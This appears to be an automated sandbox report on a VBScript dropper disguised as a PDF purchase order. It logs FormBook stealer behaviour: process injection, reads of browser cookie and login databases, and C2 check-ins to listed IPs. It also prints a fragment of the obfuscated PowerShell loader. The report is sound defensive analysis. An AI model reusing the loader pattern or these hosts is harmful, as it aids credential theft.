        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\where.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\where.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 221 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 114 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | 512 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 131 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 512 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        [Behavior graph: ID 1555634, Sample: PO-DC13112024_pdf.vbs, Startdate: 14/11/2024, Architecture: WINDOWS, Score: 100. Process chain: wscript.exe (started) -> powershell.exe (started) -> powershell.exe and conhost.exe (started) -> RegAsm.exe (started) -> WKOyCvoOlM.exe (injected) -> where.exe (started) -> WKOyCvoOlM.exe (injected) and firefox.exe (started).]

        Source | Detection | Scanner | Label | Link
        PO-DC13112024_pdf.vbs | 3% | ReversingLabs | |
        PO-DC13112024_pdf.vbs | 10% | Virustotal | | Browse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Joe Sandbox version: 41.0.0 Charoite
        Analysis ID: 1555634
        Start date and time: 2024-11-14 08:14:32 +01:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration: 0h 8m 32s
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed: 10
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 2
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Sample name: PO-DC13112024_pdf.vbs
        Detection: MAL
        Classification: mal100.spre.troj.spyw.expl.evad.winVBS@12/8@11/7
        EGA Information:
        • Successful, ratio: 60%
        HCA Information:
        • Successful, ratio: 95%
        • Number of executed functions: 43
        • Number of non-executed functions: 312
        Cookbook Comments:
        • Found application associated with file extension: .vbs
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target WKOyCvoOlM.exe, PID 6008 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 1276 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        Time | Type | Description
        02:15:32 | API Interceptor | 45x Sleep call for process: powershell.exe modified
        02:16:43 | API Interceptor | 2049124x Sleep call for process: where.exe modified
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1628158735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:NlllulF7///h:NllU
                                                                                        MD5:34C16D1FA50B565A72B382C978CB2D56
                                                                                        SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                                                                                        SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                                                                                        SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:@...e................................................@..........
                                                                                        Process:C:\Windows\SysWOW64\where.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
Preview:SQLite format 3......@ .......Y...........6......................................................j............W....
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        File type:ASCII text, with CRLF line terminators
                                                                                        Entropy (8bit):5.452694118869561
                                                                                        TrID:
                                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                                        File name:PO-DC13112024_pdf.vbs
                                                                                        File size:13'902 bytes
                                                                                        MD5:07213aa47f52b96d0e8aa463a384bcf9
                                                                                        SHA1:d14f3d9f87a233f21a6d3e9a4cffeaba0bef144b
                                                                                        SHA256:069cf757c1829b0ceb918585fca5765b259546b12eb729b1d44b956effa3f290
                                                                                        SHA512:4e69763dcc9abee6841887cefb2f6fc188004a274b590e3ad2931b763f1a34255c5d74b7847a8d0279f2415f87066900c861ed3fe96b5d8a1e5de6ebb64dacba
                                                                                        SSDEEP:192:SNu8rDyH0yTD2lAgHiLM00oL3/4cHlaEcixOF9aBMDxpnO/966KG:M+TTwrHv0n3tF/xcGMFpW66X
                                                                                        TLSH:08521E026BB0CBF03D6FAB68A31726155910032DA8356ECE48F6C0EC2DBE4E56F7559D
                                                                                        File Content Preview: 'g..hdfkprhFpmc = rRegisggfgtaaeeadkggns2211 & ""..Call Ugsfisging("$co" & "digo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E")..Call Ugsfisging("0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bw")..Public Const npfdgAfjg = 9..'gjmiSprc
                                                                                        Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-14T08:15:37.553182+0100 | 2047750 | ET MALWARE Base64 Encoded MZ In Image | 1 | 103.20.102.62 | 80 | 192.168.2.5 | 49704 | TCP
2024-11-14T08:15:37.556209+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 103.20.102.62 | 80 | 192.168.2.5 | 49704 | TCP
2024-11-14T08:15:41.182915+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 185.199.111.133 | 443 | 192.168.2.5 | 49705 | TCP
2024-11-14T08:15:50.576994+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.5 | 49732 | TCP
2024-11-14T08:16:13.926913+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 63373 | TCP
2024-11-14T08:16:15.332037+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 63381 | TCP
2024-11-14T08:16:22.358617+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 63422 | 199.59.243.227 | 80 | TCP
2024-11-14T08:16:22.358617+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63422 | 199.59.243.227 | 80 | TCP
2024-11-14T08:16:47.405053+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63487 | 156.232.181.155 | 80 | TCP
2024-11-14T08:16:49.952180+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63488 | 156.232.181.155 | 80 | TCP
2024-11-14T08:16:52.498929+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63489 | 156.232.181.155 | 80 | TCP
2024-11-14T08:16:54.529953+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 63490 | 156.232.181.155 | 80 | TCP
2024-11-14T08:16:54.529953+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63490 | 156.232.181.155 | 80 | TCP
2024-11-14T08:17:02.561483+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63491 | 101.35.209.183 | 80 | TCP
2024-11-14T08:17:04.592653+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63492 | 101.35.209.183 | 80 | TCP
2024-11-14T08:17:07.373936+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63493 | 101.35.209.183 | 80 | TCP
2024-11-14T08:17:09.686592+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 63494 | 101.35.209.183 | 80 | TCP
2024-11-14T08:17:09.686592+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63494 | 101.35.209.183 | 80 | TCP
2024-11-14T08:17:16.548482+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63495 | 203.161.46.205 | 80 | TCP
2024-11-14T08:17:19.096313+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63496 | 203.161.46.205 | 80 | TCP
2024-11-14T08:17:21.645493+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63497 | 203.161.46.205 | 80 | TCP
2024-11-14T08:17:24.177140+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 63498 | 203.161.46.205 | 80 | TCP
2024-11-14T08:17:24.177140+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63498 | 203.161.46.205 | 80 | TCP
2024-11-14T08:17:30.229642+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63499 | 161.97.142.144 | 80 | TCP
2024-11-14T08:17:32.780060+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63500 | 161.97.142.144 | 80 | TCP
2024-11-14T08:17:35.345872+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63501 | 161.97.142.144 | 80 | TCP
2024-11-14T08:17:37.893093+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 63502 | 161.97.142.144 | 80 | TCP
2024-11-14T08:17:37.893093+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 63502 | 161.97.142.144 | 80 | TCP
2024-11-14T08:17:45.124379+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 63503 | 43.155.76.124 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Nov 14, 2024 08:15:35.205578089 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.208519936 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.208542109 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.208564997 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.208584070 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.208627939 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412266970 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412343025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412412882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412416935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412467957 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412487030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412504911 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412517071 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412537098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412540913 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412592888 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412611961 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412627935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412645102 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412648916 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412662983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412684917 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412720919 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412755013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412781954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412794113 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412844896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412863970 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412880898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412899017 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412904978 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412915945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412936926 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412940979 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412955999 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412972927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.412986040 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.412995100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413005114 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413057089 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413075924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413084984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413094997 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413136959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413165092 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413182974 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413218975 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413240910 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413259029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413276911 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413290977 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413295031 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413312912 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413321972 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413350105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413367987 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413373947 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413384914 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413466930 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413475990 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413490057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413502932 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413506985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413528919 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413558960 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413590908 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413609982 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413645983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413664103 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413669109 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413697004 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413698912 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413753033 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413760900 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413773060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413805008 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413824081 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413835049 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413841009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413862944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413866997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413880110 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413897991 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413911104 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413914919 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413932085 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413945913 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413949013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413965940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.413969994 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.413984060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.414005041 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.414031029 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.414491892 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420208931 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420273066 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420319080 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420329094 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420344114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420377970 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420392036 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420429945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420449018 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420481920 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420500994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420517921 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420542002 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420543909 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420543909 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420543909 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420609951 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420629025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420655012 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420658112 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.420663118 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420681953 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420700073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.420722008 CET8049704103.20.102.62192.168.2.5
